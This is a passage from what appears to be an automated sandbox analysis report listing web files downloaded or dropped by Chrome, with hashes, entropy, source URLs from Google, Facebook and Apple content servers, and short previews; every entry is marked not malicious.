                                                                                                                                                                                                                                  Entropy (8bit):5.77863921462322
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6144:9DX863Qv0GcAi54oUrdLLqEr0eFSol7CwZFjdtungZHZDRjG8BPI6SCe4Y9shOKl:tX863Qv0GcTNUrdLLqEr0eFSWFtungZR
                                                                                                                                                                                                                                  MD5:571E845C97451949CFD2F8C0F8A01694
                                                                                                                                                                                                                                  SHA1:C18EE01607A9F06ADD3CAF55951A8E6F7C48DD25
                                                                                                                                                                                                                                  SHA-256:F6D2937810B8359D76170A09D32362B78D80BC67409AC101D60889D6003141F6
                                                                                                                                                                                                                                  SHA-512:BCAE98EE2617C68F2A2CCCE575EDB92B0431D1ED8E11B275DF346442560F384E96D705E61060C07EAECDF1AB88CF8F36B2E2B93D1C4CA572073F10181FECACC9
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,ovKuLd,pYCIec,pjICDe,pw70Gc,q0NEmc,s39S4,vrGZEc,w9hDv,wW2D8b,ws9Tlc,xQtZb,xUdipf,yDVVkb,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=soHxf,IJGqxf,wg1P6b,ywOR5c,PHUIyb,BfdUQc,oEJvKc,kJXwXb,chfSwc,pCKBF,HnDLGf,RQJprf,gKWqec,tKHFxf,M2Qezd,rpbmN"
                                                                                                                                                                                                                                  Preview:"use strict";_F_installCss(".hUTled{height:50px;left:50%;margin-left:-25px;margin-top:-25px;position:fixed;text-align:center;top:50%;width:50px;z-index:20001}.k7smx{background-color:#fff;bottom:0;left:0;opacity:.5;position:fixed;right:0;top:0;z-index:20000}.rFrNMe{-webkit-user-select:none;-webkit-user-select:none;-webkit-tap-highlight-color:transparent;display:inline-block;outline:none;padding-bottom:8px;width:200px}.aCsJod{height:40px;position:relative;vertical-align:top}.aXBtI{display:flex;position:relative;top:14px}.Xb9hP{display:flex;box-flex:1;flex-grow:1;flex-shrink:1;min-width:0%;position:relative}.A37UZe{box-sizing:border-box;height:24px;line-height:24px;position:relative}.qgcB3c:not(:empty){padding-right:12px}.sxyYjd:not(:empty){padding-left:12px}.whsOnd{box-flex:1;flex-grow:1;flex-shrink:1;background-color:transparent;border:none;display:block;font:400 16px Roboto,RobotoDraft,Helvetica,Arial,sans-serif;height:24px;line-height:24px;margin:0;min-width:0%;outline:none;padding:0;
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):4286
                                                                                                                                                                                                                                  Entropy (8bit):4.933290584110762
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:96:5+8ItBBBuxc+6QQQQQiRRRRRRRRRRJJO9P111118B:1cjRRRRRRRRRRi90
                                                                                                                                                                                                                                  MD5:8CDDCA427DAE9B925E73432F8733E05A
                                                                                                                                                                                                                                  SHA1:1999A6F624A25CFD938EEF6492D34FDC4F55DEDC
                                                                                                                                                                                                                                  SHA-256:89676A3FB8639D6531C525E5800FF4CC44D06D27FF5607922D27E390EB5B6E62
                                                                                                                                                                                                                                  SHA-512:20FBEE2886995C253E762F2BB814AD16890B0989DEAB4D92394363EF0060B96A634D87C380C7BA1B787A8AB312BE968FED9329A729B4E0D64235A09E397DB740
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/yb/r/hLRJ1GG_y0J.ico
                                                                                                                                                                                                                                  Preview:...... .... .........(... ...@..... ......................................................................e.G.c.......................d...c...e.G.............................................................................j...f...f...f...e.......................f...f...f...g...f...j...........................................................m$..j...i...h...h...h...h.......................h...h...h...h...h...i...j...m$..............................................j...j...j...j...j...j...k...j.......................j...k...j...k...k...k...k...l...u.......................................q.-.n...m...l...m...l...l...m...l.......................l...m...l...m...m...m...m...m...n...q.-.............................u...p...o...o...o...o...o...o...o...o.......................o...p...o...p...p...o...p...o...o...p...u........................$..r...r...q...q...q...q...q...q...r...q.......................r...q...r...q...q...r...q...r...r...q...r....$..................v...t...t...t...t...t...t...t...t
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):339
                                                                                                                                                                                                                                  Entropy (8bit):5.18336194072865
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:6:kRZzRxVvnsodAuGNG/QVIAhitVnSvOwQRaNw6JpyxZRNlad0:kRZTFsZI/AIai6v7kbRN20
                                                                                                                                                                                                                                  MD5:45697781B20F80072845A38DA7F7CF99
                                                                                                                                                                                                                                  SHA1:29F0FFCC0411E60DC7DD063DFEB6D97DACA9537A
                                                                                                                                                                                                                                  SHA-256:109B67697C101DBBE438C496BC6FD58D9472BDE2F9BE31F845AE1C3C8DA43EE6
                                                                                                                                                                                                                                  SHA-512:03793CA34698959B62F8D06BFAEE7444C9E719EEB4C3E5DF009ECA05FA14F5F5635F77F2A1963D2E4638E7E24092ABC2EB453A118BEC89753C01FF5667338A1F
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=A1yn5d,A7fCU,ArluEf,BBI74,BVgquf,BfdUQc,EEDORb,EFQ78c,ElYdAc,FuzVxc,GjTCAc,GkRiKb,HnDLGf,I8lFqf,IJGqxf,IZT63,IcVnM,JNoxi,KUM7Z,L1AAkb,LCkxpb,LEikZe,M2Qezd,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NkwaS,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PHUIyb,PrPYRd,QIhFr,RMhBfe,RQJprf,RqjULd,SdcwHb,SpsfSb,UINLVc,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,WO9ee,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,chfSwc,dfkSTe,e3Zld,e5qFLc,ebZ3mb,fKUV3e,fPcQoe,g6aYuf,gKWqec,gychg,hKSk3e,hc6Ubd,iAQMie,kJXwXb,kWgXee,kjKdXe,kpVlPe,kr6Nlf,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mdR7q,n73qwf,oEJvKc,ovKuLd,pCKBF,pYCIec,pjICDe,pw70Gc,q0NEmc,q0xTif,qqarmf,qyd4Kb,rpbmN,s39S4,sOXFj,soHxf,tKHFxf,uj8DUc,vrGZEc,w9hDv,wW2D8b,wg1P6b,ws9Tlc,xQtZb,xUdipf,yDVVkb,yNB6me,ywOR5c,z5Gxfe,zbML3c,zr1jrb/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=pQUyNd"
                                                                                                                                                                                                                                  Preview:"use strict";this.default_PlayStoreUi=this.default_PlayStoreUi||{};(function(_){var window=this;.try{._.u("pQUyNd");._.qr(_.aCa,class extends _.rr{constructor(a){super(a.ta)}H(){return"pQUyNd"}N(){return!0}Xa(){return _.HOc}});_.$q.pQUyNd=_.rRa;._.w();.}catch(e){_._DumpException(e)}.}).call(this,this.default_PlayStoreUi);.// Google Inc..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (7780)
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):45002
                                                                                                                                                                                                                                  Entropy (8bit):5.45952480481115
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:768:/+7HfJzz/IixGgUwVy8CZD4cTxW5lVPgrfwhRBB9Y6HrjIyKqe08Hfb:W7HfvUwVy864ZL+fwh4z/b
                                                                                                                                                                                                                                  MD5:30D99FF9D0130FF15ECD46F9C4816BA6
                                                                                                                                                                                                                                  SHA1:BD98D3047B1855D008E615077D155BFEE701BB9F
                                                                                                                                                                                                                                  SHA-256:0C31EC8A54F2AF241561936BB614921C725876D403ECC78C40D2D4FEB7F2E605
                                                                                                                                                                                                                                  SHA-512:E86CE3219C565CA83FB16235980ACDB10B2E6B94028E6BA2F41701368A27600C8ADF5BA7071251E30E1D52F5958D59504F2349DC5934CC7569CEB5A085B19222
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://static.xx.fbcdn.net/rsrc.php/v3/yT/r/wc_C9ZEewR3.js
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ActorURI",["ActorURIConfig","URI"],(function(a,b,c,d,e,f,g){var h;function a(a,b){return new(h||(h=c("URI")))(a).addQueryData(c("ActorURIConfig").PARAMETER_ACTOR,b)}g.create=a;g.PARAMETER_ACTOR=c("ActorURIConfig").PARAMETER_ACTOR}),98);.__d("BladeRunnerDeferredClient",["Promise","nullthrows","requireDeferred"],(function(a,b,c,d,e,f,g){var h;a=function(){function a(){this.$1=null}var d=a.prototype;d.requestStream=function(a,b,d,e){this.$2();return c("nullthrows")(this.$1).then(function(c){return c.requestStream(a,b,d,e)})};d.logInfo=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.logInfo(a)})};d.bumpCounter=function(a){this.$2();return c("nullthrows")(this.$1).then(function(b){b.bumpCounter(a)})};d.$2=function(){this.$1==null&&(this.$1=new(h||(h=b("Promise")))(function(a){c("requireDeferred")("BladeRunnerClient").__setRef("BladeRunnerDeferredClient").onReady(function(b){a(new b())})}))};return a}();d=new a();g["default"]=d}),98);.__d("Bla
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):11900
                                                                                                                                                                                                                                  Entropy (8bit):7.979698894528496
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:4nitZWZDB4m2Rme8rwDV0Bn5+oov6ijiWJmCHxgNaj3AG5YeaRvmx6h2M:0IkdB4mQTDSRyiWJmCHxwGq/
                                                                                                                                                                                                                                  MD5:5F95006BFED89D91C40C9F8EB0572EB3
                                                                                                                                                                                                                                  SHA1:CB766FD85C02E2BE451D2A105DCC1BABB6F60E85
                                                                                                                                                                                                                                  SHA-256:61AAE5B6BB1C1334CE83F1D6D20BFCF9ED04C2936ACA95EE46CA71148C5ABDB3
                                                                                                                                                                                                                                  SHA-512:AED17F152F5899411369D1A82EA368F8BB8CAE881D1C8CD82A3D78B1B48AE70C5F53D1457A91530A4D17BF5F27AB344D33DAD2E70587150D5AA9F435173F17A2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://is1-ssl.mzstatic.com/image/thumb/PurpleSource211/v4/9b/1a/9f/9b1a9fad-186d-1acc-1511-c093c0e97bff/9812d4ae-38c2-45ce-8818-d523b841b5e0_3_iOS_6.7.jpg/230x0w.webp
                                                                                                                                                                                                                                  Preview:RIFFt...WEBPVP8X..............VP8 .-.......*....>.N.I$"!..T.......-...g.O........?77.....P.r.....m.{.........7..~...{......m.......oL_e?A.._......|'.u...o.o.....G....{.s.....?.hO............{.G....Z...l....y......Q.......n......O..........G.w....?..g.....w........z..(......k...s.!.B..!...1.c..1.c..Z.:i..W.%5{c03I..Wk....6;.v...s.y.7'.CL......~X.!.).......r%7..........."...3{..W..c..E.}.MZ..,.Z....N....~o.'.ZT...B..!.Gw.1.[.1.r...2.G~.Ul..wBwp....piA...[-KS,1.@-#.2ikq..#....{.$..Q=...@p>^+.h.......fy.h.o..............%8........u.Ri..o..Q......Wn7..'...f.ya...J?.c.^<.|..?.u..b..!...D(A...a..*.2+KJ...D.[....,_..W._C.(s..`J.....`.d..by1.>...OR....uL;..&......Z9..^...3..>...qV4X..CF..*....a.gh"..!...K.e.V....%I.".*/R`&.6...e6...u!To..>B.U...7....(f.*..I......p.KR_.c.....0.;.h8.Kq!.\.{<S......FJ...q|....|..y..y.....,.(..W..A..y.xR...s.0$f..0..(Y._..Jm.G.m[,...S(.....+h...@m.....a..H..`vd.t..}.9w5C-.....5......*....jR.i.....k..oT......7]pg7..O%..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (3857)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):1160544
                                                                                                                                                                                                                                  Entropy (8bit):5.44525335877561
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:12288:7IcMsN8pGT4l9C8OGMVi7Bv01hCAURju5p9NI:pUlT3v01Qg96
                                                                                                                                                                                                                                  MD5:56D26A46D0406F26005B8F47282EE333
                                                                                                                                                                                                                                  SHA1:69438EBE096B22A729813A305B578D0A58507384
                                                                                                                                                                                                                                  SHA-256:B5D9652D1696ADD89336DCCC3A72768A9E09D64D1186A82F2F8C38AFE117E4EF
                                                                                                                                                                                                                                  SHA-512:9BFA2CF2EDA8AE9BF95EDB16CB8E076CC18693AC25727871B3ECF1C6B22268C6745BB49A49BA66236CB9224BF6CC3DABE38229A703602A3CA62DEFE1552737F3
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:/*! See /acknowledgements.txt for open-source licenses */."use strict".define("web-experience-app/app",["exports","@ember/application","@ember/debug","@amp/web-apps-featurekit","web-experience-app/resolver","ember-load-initializers","web-experience-app/config/environment","web-experience-app/utils/config","web-experience-app/utils/consts"],(function(e,t,r,i,n,a,o,l,s){function p(e,t,r){var i.return(t="symbol"==typeof(i=function(e,t){if("object"!=typeof e||!e)return e.var r=e[Symbol.toPrimitive].if(void 0!==r){var i=r.call(e,t||"default").if("object"!=typeof i)return i.throw new TypeError("@@toPrimitive must return a primitive value.")}return("string"===t?String:Number)(e)}(t,"string"))?i:String(i))in e?Object.defineProperty(e,t,{value:r,enumerable:!0,configurable:!0,writable:!0}):e[t]=r,e}Object.defineProperty(e,"__esModule",{value:!0}),e.default=void 0,"undefined"==typeof global&&"undefined"!=typeof window&&(window.global=window).class c extends t.default{constructor(...e){super(...e)
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):79826
                                                                                                                                                                                                                                  Entropy (8bit):7.9760101657223546
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:E2XnNcR4R7Gqccjo+bhuUZ5tmQ0aYUWOl7pQAxsALYwYnvUUiUuK16cOq6CWgu:9iGRZPjo+1DZPmQrYeppQSzLYwoUUiUA
                                                                                                                                                                                                                                  MD5:A479E1F625B44C5B7A2DDEBC20B2CB11
                                                                                                                                                                                                                                  SHA1:A43FD972ED37115B2B8C42E78512A25936B43356
                                                                                                                                                                                                                                  SHA-256:5A682C84ECA4B472A7823B3B51072B7994C3FCADC8AFE8882E029676CEF8CEFC
                                                                                                                                                                                                                                  SHA-512:221B113407F0B0497BF06AFF8E6C7EC5C7058AE11913B496A39AA20B399CA3F94891460D91BA73E03F3C5C8988999094520B90C81005A554A1D223E15F20DD11
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:RIFF.7..WEBPVP8L.7../..?.M@.$7l38....._0..........s..y.:......Z..9g...#By.~....j{..v...s..?..T)].O......}.m.../.9..}M.]U./8....s...A6v..`........:......Q...v7....).@..=3.....#YMwwU.x.<...fV..2.g....t. .{f..!;..2.."....../13...`*........Z...%.f&"2......$...ED.00x...&.:".#:s...f..t.~.|.....zOG..<.>R....j....DJb..IU.'B{...%.2.....^.......J.I.I).!...7[..$!tUg:......:.3+yv.....8..)3+_...3.8G....!I...Z........}..V.T..@=..c..&|.#>..8..B.j.q...1..}..d\.!+..2.V.!>.#h...6......J.....Z..s.z9t../........m.I..S_!.)R....C."Q ....`..<_8...!.l..X."......(.V4..3.....Qv.....L.B.[..Z.~.2.L..Z..a..P..)7..r...6.C`-.RR.)..k=...3`a.$.....R..BH.R....a..W^Y...\X.l.. ;......C.y'.B..^=.!U.....".R}...?.......A...S=.t.9....|w{T#P.I.*.. U*2.*.......CO.C..t6.!......O........Y........c...[.f..:.2..R.@..d..K.\.B].....\ .^..(}.'..~....{.v....'bMn..^.R.=.L!.S.....0.8d..\J....e]..k...x..............E....Ku. ....-X.....*6#~.j..)*Q.....8o8j.......K!&..o.;AE..Qx
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:PNG image data, 192 x 192, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):2106
                                                                                                                                                                                                                                  Entropy (8bit):7.554456957317547
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:48:EWP8JUaPVKWwCtcHB3sXXRBJ3v8qkZ/aWr/3KZerMLvSOxJ3Df8sfqV1:lkJVKWw03XXZ4Meo931fq
                                                                                                                                                                                                                                  MD5:6452ED75C53E1A8E90A664DF18959A90
                                                                                                                                                                                                                                  SHA1:AC01FC2F40F0E4808E22A9C569F3775F0F15A5E2
                                                                                                                                                                                                                                  SHA-256:C7BAC3E7016DFC7EB5787579BAC6B975B433FC1A9C279DAFC35649D4782F2061
                                                                                                                                                                                                                                  SHA-512:4B23F7FB31826943CBA6496BD74DC620C8EC3B8F0525497E825F1F1F87486335D4374F85417458C3C3E018C2215B9B419D7DE77CB67AAE9EA619038432E1EB10
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:.PNG........IHDR.............e..5...YPLTEGpL.e..e..e..p..e..f..f..h..f..f..`..`.....g..f..f..g..g..f..f..f..g..f..h..e..f..d..g..e..e..c..f..f..e..f..g..g..e..f..f........i..h..e..f..f.....e........e..g..f..f..f..f..f..f..g........f..e..e.......F........................f....F.....d........'y.....p....E.....U..7..t.................6..t...........U.................................p......uy...LtRNS.0`..... ......p..._....@..@..oPP...O.^..__....0.o.o.oO..p.P.P_n. ..@0..P........DIDATx..YS.G..G.]..N...t.6&.$..8v|.>{.."....m.3...../...X...*./.....z..Z...^-."|GT(T.K..Z..n..z.3..BT..Z....\.)..Y.....)..\XZs%..e../...........:....Z.R...,X...B....VCL......".~)P...@..P..8......YG..<...=..BLs..CX........0..J...I....Z..,....0g...i...B..}6.Eh.$.g.D1.k......... ..WYD....O..b~.~......U..s4..?...d0........x.g7.zF...........9..G*.A...~...=#.w0.1Z......K..BV..>....x.p...<LS...ft..(|...2XDE.Q...yc..$Mu.@.L...R=.X,.H....!.X).j../.-q2.....09.........\...&.bYk........j.o......../.u}..(5!.
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (60871)
                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                  Size (bytes):97946
                                                                                                                                                                                                                                  Entropy (8bit):4.976414433545297
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:8mrgoskJlsmFUMsvRYoNgCWflnkO6snajeQO7:8mrBkW76ORJ
                                                                                                                                                                                                                                  MD5:79ABB7A1082240DD4B465B9FF64989C5
                                                                                                                                                                                                                                  SHA1:3F81542C95E0B17EE41217FF9C11C49A08BE9A53
                                                                                                                                                                                                                                  SHA-256:B2ECAC9C8D644496B78DDA8D634E164BBA72F1C8B5B4F841B5B913DEEB399682
                                                                                                                                                                                                                                  SHA-512:95C18CD0B04C2366FC195082E47B38D77FC9D73AA701EAF09EB04158510FB6C8F0E3C6E86AFAC876A582DD7AD570DF5B0EBB4E7FF327EF92F287CC4205C3A1B2
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Preview:;/*FB_PKG_DELIM*/..__d("ProtonColors",["cssVar","color"],(function(a,b,c,d,e,f,g,h){"use strict";var i=!1;function j(a){try{return c("color")(a)}catch(a){return i?c("color")("#000000"):null}}a=function(a,b){a=j(a)||c("color")("#000000");return a.alpha(b).string()};b={white:"#ffffff",black:"#000000",neutral0:"#f9f9fa",neutral10:"#f3f3f6",neutral20:"#edeeef",neutral30:"#e6e8ea",neutral40:"#dee0e4",neutral50:"#d6d9dd",neutral60:"#cdd1d7",neutral70:"#c4c9d0",neutral80:"#bac0c9",neutral90:"#b0b7c2",neutral100:"#a5aebb",neutral110:"#99a4b4",neutral120:"#8d99ad",neutral130:"#808fa6",neutral140:"#72839e",neutral150:"#637797",neutral160:"#596c8c",neutral170:"#4f6182",neutral180:"#455778",neutral190:"#3c4c6d",neutral200:"#334162",neutral210:"#293657",neutral220:"#212b4a",neutral230:"#18203c",neutral240:"#0f142a",darkNeutral0:"#e2e4e8",darkNeutral10:"#d5d8df",darkNeutral20:"#c7cbd4",darkNeutral30:"#b7bcc8",darkNeutral40:"#a8adbc",darkNeutral50:"#9aa0b1",darkNeutral60:"#8c94a8",darkNeutral70:"#808
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):10356
                                                                                                                                                                                                                                  Entropy (8bit):7.97345226089636
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:192:xMbrvPy5pPsGNhEK5XrjDFoNNBg0WVdDebc3S9LjYvFQkpNxXPzabcJ2W4oz:x8va5pPsGz15XrjENBg08dQc3S9LoNFh
                                                                                                                                                                                                                                  MD5:D4A18595328B1DE8209C845F4584EC65
                                                                                                                                                                                                                                  SHA1:BDA2404D091B7C92F2B06222985D8D805BCB4CA9
                                                                                                                                                                                                                                  SHA-256:09FD1ABAD6CD8C4E81D4B6D7C544FBA7983A5F05D86D692DBA83DFF101F9C451
                                                                                                                                                                                                                                  SHA-512:CAE18B974CF53F7D2EEB81635886FF5597DC7FC81F961E199E699F69A3FBEB427333940ACE2FD42DC240B986BCE32CBA981F1C4CB64128BDF5531F2724FC999A
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://play-lh.googleusercontent.com/xZ9aAAGs60bJitt4kftzG2JSgo6rpZoII33fpvOxT17217hebF4c57DA_NNns7pktTw=s64-rw
                                                                                                                                                                                                                                  Preview:RIFFl(..WEBPVP8X........?..?..VP8L$(../?...M(l....pR........j..r.'..8....%".VC.V....H..,...GE.......q.F.t9.r.Wu.|73.k..m...u:.....t?.@..g...&.a.....yY2.X.S._(...}.. .ycb. ... 3P^.x6cV./|.A.......(B^.Ul..sm.6...b...oqiQ][....e'|).__".....%`.3r.r(c(h.Fr....a...@...}..m[.}.....4CNI....h..|z....?$..6..Kv.t.q....4..3..233c..$.m7L.yO.mr....%3d..r......8.h.c.h.$m..Mj..5N-/.6o.6N.>......,...f.I'..........h......q<.&.8..:6.-.S.O..m....m.m..x.).m.d2.L........-o.m.q.x].$[.D..a..................\.w.....I...8..En.0...O<|....Y..o=.W..O.L[...7.....e.....I...by..U.(..w~.1<.Q..LAQ..]q......J. .H...[...+.2.....n"..I....... .... .B.BSLp,.:...Z..Nk..&...Z...0....+..@..F....@..p....>v...{.....R.K.L....,..n.M...v.".K$..ov.p......?.'.n..;4s*.5Q...%d.z...LzV..%&... A..1:Hl.*.A.`Z]......+t+.SLB+X .....F....~.aG{.c..w...es.E...~.m]..l.&..c....~.)~.bS..Im...A.G1a...q .1b....J.a7...^.......x.Z....;z]..>.@.......k.>...`..5j...). ...W..8'..#h.v.N.....<]gP...Y}E..w..P..S.k...%>..
                                                                                                                                                                                                                                  Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                  Category:downloaded
                                                                                                                                                                                                                                  Size (bytes):157537
                                                                                                                                                                                                                                  Entropy (8bit):5.450896766346486
                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                  SSDEEP:1536:VcQ2UlYdxMXwcK2Bg6mqBhHPVy/ynVmXeXWH2H3i47UW4nb00pqpIReMaahQYg5U:f1mhfaahWIhsMkVT+BTtdOaBrdD
                                                                                                                                                                                                                                  MD5:E8E8B7A18F4EBDA24A25F702B22FA5C1
                                                                                                                                                                                                                                  SHA1:45DF73C1E3A0A3221A36654FCC46250E31D44C3C
                                                                                                                                                                                                                                  SHA-256:B740DD04F5C2A05AC983F4716999989B7A05B48C7E4717F77729B3DF19E97E3C
                                                                                                                                                                                                                                  SHA-512:57098BD96ADF38227E5B3C05CB1C715A9207F0BD4B198E3CF2B2A654D020BA3E0D65D04614F041E4291C86D928AB290619319C8C27F54D4563CBE71779568030
                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  URL:https://www.apple.com/api-www/global-elements/global-header/v1/assets/globalheader.umd.js
